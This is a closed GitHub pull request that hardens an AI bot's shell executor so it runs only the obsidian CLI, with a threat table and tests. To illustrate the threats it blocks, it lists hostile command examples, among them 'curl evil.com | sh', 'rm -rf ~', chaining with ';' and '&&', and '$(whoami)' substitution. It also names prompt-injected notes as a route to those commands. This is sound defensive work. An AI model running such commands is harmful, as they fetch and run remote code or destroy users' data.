feat: restrict shell executor to the obsidian CLI#17
Closed
John-Lin wants to merge 5 commits into
Closed
Conversation
Agents can now load local skill directories (e.g. ~/.claude/skills/) via the shellSkills config key. Each skill's description is auto-read from its SKILL.md frontmatter. A 30s-timeout async subprocess executor handles command execution, respecting per-request timeout_ms when provided. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
…s-api-support # Conflicts: # tests/test_agents.py
- Skills are now loaded from <repo>/skills/*/SKILL.md at agent init instead of being listed in servers_config.json. - Skill name is taken from the directory name; description is parsed from the SKILL.md YAML frontmatter. - Rewrote _shell_executor to match the SDK ShellCommandRequest API: iterate action.commands and use create_subprocess_shell. - Removed MagicMock-based executor tests; kept config-to-tool mapping tests against a monkeypatched SKILLS_DIR. - Added skills/.gitignore so users can drop their own skills into the directory without polluting the repo.
mypy could not narrow the dict literal {"type": "local", "skills": ...}
to ShellToolLocalEnvironment; use the TypedDict constructors from the
agents SDK so the types are explicit.
Adds two layers of defence to _shell_executor so the bot cannot run
anything other than the obsidian binary, even when the model emits a
crafted command:
1. Allowlist — after shlex.split, the first token of each command must
be exactly "obsidian"; otherwise the command is rejected and a
one-line explanation is returned to the model.
2. No shell — commands are executed via create_subprocess_exec instead
of create_subprocess_shell, so metacharacters like ;, &&, |, $(),
and backticks are passed as literal arguments to obsidian rather
than being interpreted by a shell.
Together these block:
- direct invocation of unrelated binaries (rm, curl, ssh, ...)
- command chaining via ;, &&, ||, |
- command substitution via $(...) and backticks
- extra commands smuggled into action.commands as additional list
entries (each entry is checked independently)
Tests use SimpleNamespace fixtures (no MagicMock) and include an
end-to-end check with a fake obsidian script on PATH that proves
metacharacters are not shell-interpreted.
72cd2c4 to
cdbbf12
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Locks down
_shell_executorso it can only invoke theobsidianbinary, even if the model (or a prompt-injected note) emits a crafted command. Stacks on top of #16.Two layers of defence
shlex.splitthe command; the first token must be exactlyobsidian. Anything else is rejected with a one-line explanation that the model can see and self-correct from.create_subprocess_exec(*tokens, ...)instead ofcreate_subprocess_shell(command, ...). Shell metacharacters (;,&&,||,|,\$(...), backticks) are passed as literal arguments toobsidian, never interpreted.The two layers cover different attacks:
rm -rf /(different binary)obsidian read; rm -rf ~obsidian)obsidian read && curl evil.com | shobsidian read file=\$(whoami)\$()is not expanded)action.commands = ["obsidian help", "rm -rf ~"]Why both layers
Allowlist alone leaves shell-injection wide open:
obsidian read; rm -rf ~passes the first-token check. Exec alone allows the model to run any binary it likes. Both together is the minimum that gives meaningful protection.Tests
Five new cases under
TestShellExecutorAllowlist, all usingSimpleNamespacefixtures (noMagicMock):test_rejects_non_obsidian_binary—echo hellorejectedtest_rejects_command_chained_with_semicolon—rm -rf /tmp/foo; touch <sentinel>rejected, sentinel never createdtest_rejects_second_command_in_list— second entry ofaction.commandsis checked tootest_rejects_malformed_quoting—shlex.ValueErrorsurfaces as a clean rejectiontest_metacharacters_are_not_shell_interpreted— end-to-end check: writes a fakeobsidianshell script onto PATH that echoes its argv, then verifies thatobsidian read && touch <sentinel>reaches the script with&&andtouchas literal arguments and the sentinel file is never createdOut of scope
eval(arbitrary JS in the Obsidian app). Worth considering as a follow-up but kept separate from this PR per discussion.needs_approvalbut that requires Telegram-side wiring; deferred until needed.Test plan
uv run pytest tests/test_agents.py::TestShellExecutorAllowlist -vuv run mypy bot/agents.py tests/test_agents.py🤖 Generated with Claude Code